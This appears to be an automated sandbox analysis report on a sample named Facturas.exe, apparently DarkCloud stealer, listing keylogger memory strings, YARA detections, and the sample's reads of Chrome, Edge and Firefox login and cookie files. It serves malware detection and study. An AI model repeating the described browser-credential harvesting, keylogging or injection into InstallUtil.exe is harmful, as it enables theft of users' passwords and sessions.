Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:03]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 03:14:01]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:40]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :04]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataoZHPMIPe.txt.2.dr	Binary or memory string: [03:12:05]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:19]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:27]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3:13:48]<<Program Manager>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDatalMReqyDc.txt.2.dr, KeyDataAgrYXqvU.txt.2.dr	Binary or memory string: [03:13:41]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:04]<<Program Manager>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerex.com"nager9
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:14]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:49]<<Program Manager>>Prog
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:49]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:37]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager-release.ocx
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:54]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3:12:21]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:05]<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataoZHPMIPe.txt.2.dr	Binary or memory string: [03:12:10]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:48]<<Program Manager>>sv:C*
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp, KeyDatakrnXjDpS.txt.2.dr, KeyDataYDwqSImV.txt.2.dr	Binary or memory string: [03:13:58]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDatasTLASBBX.txt.2.dr, KeyDataEHCgjwEU.txt.2.dr	Binary or memory string: [03:13:31]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:39]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:21]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:03]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:56]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LC:\Users\user\AppData\Local\Comms12:17]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:12]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:05]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp, KeyDataSojrcmUK.txt.2.dr	Binary or memory string: [03:13:48]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :13:38]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:09]<<Program Manager>>Q
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:20]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:47]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:04]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:46]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:57]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:05<<Program Manager>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3:12:23]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:24]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [3:14:03]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp, KeyDataytxpjpTS.txt.2.dr	Binary or memory string: [03:13:56]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataQusNBrHR.txt.2.dr, KeyDataQeSjVzIZ.txt.2.dr	Binary or memory string: [03:13:34]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataytxpjpTS.txt.2.dr, KeyDataBXpKTjRE.txt.2.dr	Binary or memory string: [03:13:55]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataQusNBrHR.txt.2.dr, KeyDataEHCgjwEU.txt.2.dr	Binary or memory string: [03:13:33]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:00]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 03:14:04]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataEHCgjwEU.txt.2.dr	Binary or memory string: [03:13:32]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataBXpKTjRE.txt.2.dr	Binary or memory string: [03:13:54]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :13:19]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:45]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:02]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerogram Manager
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:23]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:44]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:01]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:22]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:05]<<Program Manager>>rogG
Source: InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:14:04]<Program Manager>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerex.com"nager1
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:58]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDatayYYgRewy.txt.2.dr, KeyDataBXpKTjRE.txt.2.dr	Binary or memory string: [03:13:53]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:52]<<Program Manager>>ogram
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:46]<<Program Manager>>es
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:55]<<Program Manager>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:26]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3:13:53]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2486090424.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:59]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:33]<<Program Manager>>anag
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:19]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:43]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataoZHPMIPe.txt.2.dr	Binary or memory string: [03:12:09]<<Program Manager>>
Source: KeyDatalpqVYngJ.txt.2.dr, KeyDataQeSjVzIZ.txt.2.dr	Binary or memory string: [03:13:36]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:59]<<Program Manager\
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:42]<<Program Manager>>
Source: InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:18]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2:13]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDataQeSjVzIZ.txt.2.dr	Binary or memory string: [03:13:35]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:13:46]<<Program Manager>>y
Source: InstallUtil.exe, 0000000E.00000002.2486543895.0000000003B77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 03:14:03]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2486090424.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2485074504.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [03:12:25]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, KeyDatayYYgRewy.txt.2.dr, KeyDatadMAuPpXP.txt.2.dr	Binary or memory string: [03:13:52]<<Program Manager>>
Source: InstallUtil.exe, 00000002.00000002.2482222234.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 13:53]<<Program Manager>>

Source: C:\Users\user\Desktop\Facturas.exe	Queries volume information: C:\Users\user\Desktop\Facturas.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Queries volume information: C:\Users\user\AppData\Roaming\Id.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 13.2.Id.exe.3ff6f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Id.exe.3ff6f40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Facturas.exe.3fc7d60.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Facturas.exe.3fc7d60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Facturas.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7444, type: MEMORYSTR

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: Facturas.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 7412, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 13.2.Id.exe.3ff6f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Id.exe.3ff6f40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Facturas.exe.3fc7d60.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Facturas.exe.3fc7d60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Facturas.exe PID: 7004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7444, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
